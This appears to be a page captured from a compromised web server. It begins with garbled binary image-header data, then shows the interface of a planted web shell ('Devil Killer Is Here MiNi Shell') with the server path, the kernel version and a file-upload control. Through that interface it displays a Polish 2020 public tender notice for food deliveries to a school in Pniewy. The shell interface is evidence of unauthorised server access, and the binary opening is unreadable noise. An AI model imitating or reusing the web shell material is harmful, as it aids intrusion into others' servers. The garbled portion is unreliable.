JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20201125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20201125/615320-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 615320-N-2020 z dnia 2020-11-25 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Pniewy Zespół Szkół im. Emilii Sczanieckiej</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">SUKCESYWNY ZAKUP I DOSTAWA ARTYKUŁÓW SPOZYWCZYCH DLA ZESPOŁU SZKÓŁ IM. E. SCZANIECKIEJ W PNIEWACH -2021 ROK</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Pniewy Zespół Szkół im. Emilii Sczanieckiej</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">00077721400000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Wolności</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">10</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">62-045</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Pniewy</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">wielkopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">612910607, 612911844</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zespolszkolpniewy@wp.pl, bursa_szkolna_pniewy@interia.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax"></span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url"></span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Zespół Szkół im. E. Sczanieckiej</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">tak</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.zespolszkolpniewy.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony">nie</span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny">nie</span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">nie</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"></span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">SUKCESYWNY ZAKUP I DOSTAWA ARTYKUŁÓW SPOZYWCZYCH DLA ZESPOŁU SZKÓŁ IM. E. SCZANIECKIEJ W PNIEWACH -2021 ROK</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny"></span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">6</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">WARZYWA ŚWIEŻE, OWOCE Banany kg 1050 Arbuz (odVI-IX) kg 120 Ananas świeży szt 60 Brukselka świeża (IX) kg 10 Brzoskwinie (od V-IX) kg 240 Buraki kg 750 Brokuły szt 170 Bazylia doniczka szt 40 Borówki op 0,5 kg (VII, VIII) szt 5 Cebula kg 650 Cukinia kg 60 Cytryna kg 140 Czosnek siatka 1 kg szt 35 Dynia owoc IX - XI kg 110 Fasolka szparagowa żółta (IX) kg 5 Imbir korzeń kg 1 Jabłka kg 1350 Gruszka kg 435 Kalafior świeży szt 220 Kalarepa szt 110 Kapusta biała (od I-IV i IX-XII) kg 1000 Kapusta biała młoda (od V-VIII) kg 400 Kapusta włoska szt 140 Kapusta czerwona kg 420 Kiwi pakowane pojedynczo szt 1400 Koperek świeży PĘCZKI 1800 Kapusta pekińska –główka główka 120 Lubczyk doniczka szt 30 Marchew korzeń kg 1050 Mandarynki kg 75 Maliny 250g szt 10 Mango kg 2 Melon kg 3 Mięta doniczka szt 40 Nektarynka (od V-IX) kg 120 Oregano doniczka szt 15 Ogórki zielone świeże (VII, VIII, IX) kg 140 Ogórki zielone świeże ( I-VI, X-XII) kg 370 Papryka czerwona świeża( I-VI, X-XII) kg 90 Papryka czerwona świeża (VII, VIII, IX ) kg 40 Papryka żółta świeża kg 15 Pieczarki świeże kg 200 Pietruszka korzeń kg 600 Pomidory (od I-VI i od X do XII) kg 250 Pomidory (VII, VIII, IX) kg 120 Pomidorki koktajlowe op. 250g szt 15 Pomarańcza kg 130 Por kg 470 Rabarbar - m-c lipiec, sierpień kg 5 Rzodkiewka pęczek 200 Rozmaryn doniczka szt 25 Rukola liście op 100g szt 10 Roszponka liście op 100g szt 10 Sałata zielona główka 190 Sałata lodowa główka 30 Seler korzeń kg 850 Seler naciowy 0,5 kg szt 10 Szczypiorek świeży pęczek 415 Szparagi m-c maj pęczek 100 Tymianek doniczka szt 10 Truskawki - m-c czerwiec, lipiec kg 5 Winogrono kg 7 Zielona pietruszka świeża pęczek pęczek 1600 Ziemniaki młode (V, VI, VII) kg 2500 Ziemniaki jadalne kg 13000MROŻONKI, RYBY MROŻONE, PRZETWORY RYBNE Brokuły mrożone op 2 kg op 110 Brukselka mrożona op 2,5 kg op 70 Fasolka szparagowa cieta op 2,5 op 100 Fasolka żółta cała 2,5kg op 38 Groszek mrożony op 2,5 op 45 Kalafior mrożony op 2 kg op 170 Lody śmietankowe intense 1 litr szt 12 Makrela wędzona kg 12Marchew mrożona op 2,5 kg op 120 Marchew z groszkiem mrożona op 2,5 kg op 149 Marchewka mini op 2,5 kg op 150 Marchew plastry faliste op 2,5kg op 25 Mieszanka chińska 450g szt 200 Mieszanka europejska 2,5 kg 3 składnikowa (kalafior, brokuł, marchewka) op 111 Matias – śledź solony wiaderko 2kg szt 70 Pyzy drożdżowe op 9 szt op 1300 Papryka trio paski op 2,5 kg op 15 Wiśnie mrożone op 2,5 kg op 35 Truskawki mrożone op 2,5 kg op 14 Czarna porzeczka 2,5 kg op 2 Malina 2,5 kg op 8 Mieszanka kompotowa op 2,5 kg szt 6 Ryba mrozona mintaj SHP kg 120 Ryba mrożona dorsz SHP kg 220Ryba mrozona morszczuk SHP kg 200 Ryba mrożona miruna SHP kg 300 Szpinak mrozony op2,5 kg op 21 Włoszczyzna w paski op 2,5 kg op 180 Warzywa na patelnie (premium, azjatyckie, wykwintne, wiejskie) 450g op 15 Zupa wiosenna 8 składnikowa op 2,5 kg op 30 PIECZYWO, CIASTO Bułka mała 60 g szt 8000 Bułka hamburgerowa 120g szt 300 Bułka kukurydziana 80g szt 2000 Bułka graham 80g szt 7000 Bułka hot-dog 80g szt 360 Bułka mleczna 60 g szt 200 Rogal maślany 60g szt 100 Bułka tarta 1 kg kg 350Chleb wieloziarnisty 500g krojony szt 360 Chleb zwykły 600g krojony szt 1100 Bagietka 30cm szt 30 Chleb razowy żytni 500g - krojony szt 330 Chleb pasterski 500g krojony szt 140 Chleb wiejski 500g szt 80 Kawiorek 350gr krojony szt 300 Drożdżówki 100g, szt 1800 ciastko francuskie z jabłkiem szt 150 Pączek szt 70 Babka poznańska kg 6 Pierniki kg 6 Rogale kg 8 Makowiec kg 5 MIĘSO I PRZETWORY Karkówka wieprzowa b/k surowa kg 280 Łopatka wieprzowa b/k zmielona kg 950 Mięso gulaszowe krojone w kostkę kg 400 Schab b/k surowy kg 790 szynka b/k kulka kg 175 Żeberka I klasa kg 100 Polędwica wieprzowa kg 8 Filet z kurczaka bez chrząstki świeży kg 1800Kurczak cały świeży, patroszony, tusza kg 55 Filet z indyka kg 120 Skrzydła z indyka kg 100 Porcje rosołowe świeźe kg 1200 Udo z kurczaka świeźe, surowe bez kości krzyzowej kg 950 Pałka z kurczaka kg 30 Udziec z kurczaka kg 5 Boczek parzony kg 90 Kieł. biała cieńka delikatesowa 86% miesa kg 3 Kieł. typu farmerska kg 6 Kieł. typu kanapkowa kg 2,6 Kieł. typu śląska 90% miesa kg 90 Kieł. typu śląska 90% miesa - cienka kg 30 Kieł. typu zielonogórska kg 2 Kieł. typu zwyczajna kg 140 Kiełbaski pieprzowe - cienkie kg 30Kieł. typu żywiecka kg 15 Kieł. Typu Wiejska kg 2 Kabanosy wieprzowe kg 8 Łopatka wieprzowa wędlina -73 % mięsa kg 5 Mielonka wieprz. kg 1 Mielonka zapiekana kg 1 Ogonówka parzona kg 25 Parówki cieńkie 85% mięsa kg 65 Polędwica typu sopocka kg 30 Polędwiczka wędzona kg 7 polędwica staropolska kg 8 Salami kg 5 Serdelki kg 20 szynka bamberka 73 % mięsa kg 10 Szynka gotowana kg 40 szynka bez wędzenia 74 % mięsa kg 20 szynka starowiejska kg 8 Szynka konserwowa kg 18 szynka pieczona 73 % mięsa kg 17szynka polska kg 9 Szynka tyrolska kg 5 szynka wiejska kg 18 szynka wiejska wędzona 99% mięsa kg 12 szynka ze wsi 96,5 % mięsa kg 10 szynka drobiowa 85 % mięsa kg 40 szynka delikatesowa z kurcząt 89% mięsa kg 10 szynka -pierś o smaku maslanym 79% mięsa kg 10 szynka - polędwica z kurcząt - 89% mięsa kg 10 szynka drobiowa z papryką - 89% mięsa kg 10Pierś pieczona z pomidorami i ziołami - 97 % mięsa kg 10 Pierś pieczona 97% mięsa kg 10Wędlina drobiowa kg 8Szynkowa wieprzowa kg 17Smalec kg 2 </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">15300000-1</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>03200000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15100000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15110000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15131500-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15331100-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15229000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15000000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15830000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15610000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15872400-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15320000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15811000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15511000-3</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia">2021-01-02</span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2021-12-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 Zamawiający wymaga złożenie podpisanego oświadczenia stanowiącego załącznik nr 2 I 3 do SIWZ. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający wymaga złożenie podpisanego oświadczenia stanowiącego załącznik nr 2 do SIWZ</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający wymaga złożenie podpisanego oświadczenia stanowiącego załącznik nr 2 do SIWZ</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia 